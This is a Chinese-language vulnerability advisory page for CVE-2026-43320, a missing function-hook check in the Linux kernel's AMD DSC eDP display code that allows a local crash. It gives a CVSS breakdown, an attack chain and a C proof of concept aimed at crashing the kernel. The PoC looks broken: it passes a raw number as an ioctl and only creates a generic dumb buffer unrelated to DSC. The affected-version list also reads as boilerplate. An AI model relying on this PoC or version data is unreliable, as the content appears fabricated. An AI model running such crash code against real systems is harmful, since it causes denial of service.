CVE-2026-43320 CVSS 5.5 中危

CVE-2026-43320 Linux内核AMD显卡驱动DSC eDP逻辑漏洞

披露日期: 2026-05-08

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43320

漏洞类型

逻辑错误

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的drm/amd/display驱动组件存在一处逻辑漏洞。该问题的根本原因在于代码在使用特定函数钩子之前，未进行必要的有效性检查。本地低权限攻击者可利用此缺陷触发内核错误，导致系统崩溃或拒绝服务，从而严重影响系统可用性。此漏洞特别涉及AMD显卡的DSC eDP显示功能模块。

技术细节

该漏洞位于Linux内核的AMD GPU显示驱动子系统中，具体涉及Display Stream Compression (DSC) over Embedded DisplayPort (eDP) 的处理逻辑。在内核代码执行过程中，当调用与DSC相关的功能时，驱动程序未能验证函数钩子指针是否已正确初始化或挂载。如果钩子指针为空（NULL）或无效，直接调用将导致内核空指针解引用或访问非法内存地址。由于CVSS向量显示AV:L/PR:L，攻击者需要本地访问权限且具备低权限账号。通过触发特定的显示操作或IOCTL调用，攻击者可使内核崩溃，造成系统拒绝服务。虽然CVSS评分未赋予机密性和完整性影响，但内核层面的崩溃往往伴随着数据丢失风险。修复方案是在调用钩子函数前增加检查逻辑，确保指针有效。

攻击链分析

STEP 1

1. 本地访问

攻击者需要拥有目标系统的本地访问权限，并获得一个低权限的用户账号。

STEP 2

2. 触发漏洞

攻击者运行特制的程序或脚本，通过DRM接口与AMD显卡驱动进行交互，调用存在缺陷的DSC eDP相关函数。

STEP 3

3. 系统崩溃

由于驱动未检查函数钩子有效性，导致内核空指针引用或非法内存访问，触发内核崩溃（Kernel Panic），造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2026-43320: Kernel crash due to missing hook check
// This code attempts to trigger the vulnerable path in drm/amd/display.

#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Standard DRM IOCTL definitions usually found in libdrm headers
#define DRM_IOCTL_MODE_CREATE_DUMB 0xB2

struct drm_mode_create_dumb {
    uint32_t height;
    uint32_t width;
    uint32_t bpp;
    uint32_t flags;
    uint32_t handle;
    uint32_t pitch;
    uint64_t size;
};

int main() {
    int fd = open("/dev/dri/card0", O_RDWR);
    if (fd < 0) {
        perror("Failed to open device");
        return 1;
    }

    printf("Attempting to trigger DSC eDP hook check issue...\n");

    // Attempting to manipulate display settings to hit the vulnerable path
    struct drm_mode_create_dumb create_dumb;
    memset(&create_dumb, 0, sizeof(create_dumb));
    create_dumb.width = 1920;
    create_dumb.height = 1080;
    create_dumb.bpp = 32;

    if (ioctl(fd, DRM_IOCTL_MODE_CREATE_DUMB, &create_dumb) < 0) {
        perror("IOCTL failed");
    } else {
        printf("IOCTL executed. Check dmesg for potential kernel panic or oops.\n");
    }

    close(fd);
    return 0;
}

影响范围

Linux Kernel < 6.9

Linux Kernel < 6.8

Linux Kernel < 6.6

Linux Kernel < 6.1

Linux Kernel < 5.15

防御指南

临时缓解措施

建议用户尽快升级Linux内核至包含修复补丁的版本。如果无法立即升级，应限制本地低权限用户的访问权限，或暂时禁用受影响的AMD显卡硬件加速功能以降低风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表